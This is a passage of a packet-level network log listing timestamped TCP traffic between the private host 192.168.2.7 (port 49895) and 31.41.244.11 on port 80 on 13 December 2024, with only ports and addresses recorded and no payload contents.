Dec 13, 2024 18:53:43.970282078 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.970330000 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.970376015 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.973593950 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.973659992 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.973721981 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.973767996 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.976923943 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.977005959 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.977005959 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.977050066 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.980123997 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.980185032 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.980259895 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.980309010 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.983325005 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.983377934 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.983460903 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.983506918 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.986455917 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.986531973 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.986581087 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.986624956 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.989509106 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.989573956 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.989592075 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.989635944 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.992532015 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.992587090 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.992594957 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.992636919 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.995522976 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.995585918 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.995630980 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.995676994 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.998543024 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.998600960 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.998675108 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.998719931 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.001552105 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.001606941 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.001652002 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.001701117 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.004566908 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.004628897 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.004722118 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.004766941 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.007584095 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.007643938 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.007688046 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.007726908 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.010584116 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.010648012 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.010701895 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.010749102 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.013596058 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.013655901 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.013742924 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.013789892 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.016587973 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.016657114 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.016660929 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.016702890 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.019640923 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.019700050 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.019705057 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.019741058 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.022708893 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.022777081 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.022842884 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.022888899 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.025705099 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.025755882 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.025768042 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.025804043 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.028692961 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.028754950 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.028796911 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.028842926 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.031691074 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.031750917 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.031760931 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.031804085 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.034720898 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.034773111 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.034818888 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.034862995 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.037856102 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.037929058 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.037946939 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.037988901 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.040770054 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.040827036 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.041114092 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.041160107 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.043740034 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.043792963 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.043838978 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.043884039 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.046761036 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.046823978 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.046912909 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.046957970 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.049761057 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.049806118 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.049993992 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.050039053 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.052714109 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.052764893 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.052854061 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.052896023 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.055835962 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.055912971 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.055944920 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.055991888 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.058820009 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.058887959 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.058890104 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.058933973 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.061938047 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.061985016 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.061992884 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.062032938 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.064809084 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.064904928 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.064979076 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.067859888 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.067931890 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.068032026 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.068078995 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.070909977 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.070960045 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.071021080 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.071065903 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.073872089 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.073951960 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.074003935 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.074038029 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.076793909 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.076847076 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.147659063 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.147702932 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.147722960 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.147763014 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.148962021 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.149007082 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.149132967 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.149174929 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.151124954 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.151180029 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.151192904 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.151228905 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.153292894 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.153348923 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.153377056 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.153412104 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.155594110 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.155639887 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.155715942 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.155769110 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.158057928 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.158107996 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.158190012 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.158229113 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.160176992 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.160222054 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.160278082 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.160312891 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.162374973 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.162420988 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.162441969 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.162477970 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.164572001 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.164629936 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.164671898 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.164855003 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.166712999 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.166765928 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.166857004 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.166898012 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.168807030 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.168854952 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.168916941 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.168958902 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.170867920 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.170914888 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.170985937 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.171027899 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.172909975 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.172960043 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.173017979 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.173059940 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.174963951 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.175009966 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.175086021 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.175126076 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.177004099 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.177053928 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.177155018 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.177196980 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.178931952 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.178981066 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.179028988 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.179080009 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.180932999 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.180986881 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.181066990 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.181111097 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.182837963 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.182889938 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.182955027 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.182998896 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.184756994 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.184806108 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.184844017 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.184886932 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.186718941 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.186770916 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.186820030 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.186863899 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.188621998 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.188688993 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.188709021 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.188766003 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.190505981 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.190570116 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.190597057 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.190637112 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.192343950 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.192389965 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.192433119 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.192468882 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.194188118 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.194235086 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.194328070 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.194370031 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.196091890 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.196141958 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.196186066 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.196228027 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.197904110 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.197952986 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.197999954 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.198045969 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.199707031 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.199757099 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.199816942 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.199858904 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.201600075 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.201659918 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.201725960 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.201769114 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.203638077 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.203720093 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.203751087 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.203795910 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.205374956 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.205423117 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.205461979 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.205552101 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.207026958 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.207091093 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.207150936 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.207195044 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.208790064 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.208844900 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.208888054 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.208931923 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.210591078 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.210642099 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.210766077 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.210809946 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.212440014 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.212493896 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.212512970 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.212549925 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.214243889 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.214303017 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.214380980 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.214425087 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.216036081 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.216089964 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.216109991 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.216155052 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.217866898 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.217919111 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.217967033 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.218008995 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.219696045 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.219743967 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.219826937 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.219886065 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.221548080 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.221602917 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.221676111 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.221719027 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.223324060 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.223371983 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.223416090 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.223458052 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.225358009 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.225409985 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.225502014 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.225544930 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.227161884 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.227207899 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.227231979 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.227276087 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.228796005 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.228842974 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.228913069 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.228955984 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.230801105 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.230850935 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.230911016 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.230954885 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.232530117 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.232582092 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.232652903 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.232696056 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.234209061 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.234256029 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.234340906 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.234383106 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.236063957 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.236112118 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.236229897 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.236274958 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.237854004 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.237901926 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.237946033 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.237989902 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.239662886 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.239712954 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.239789963 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.239835978 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.241472006 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.241527081 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.241570950 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.241615057 CET	49895	80	192.168.2.7	31.41.244.11
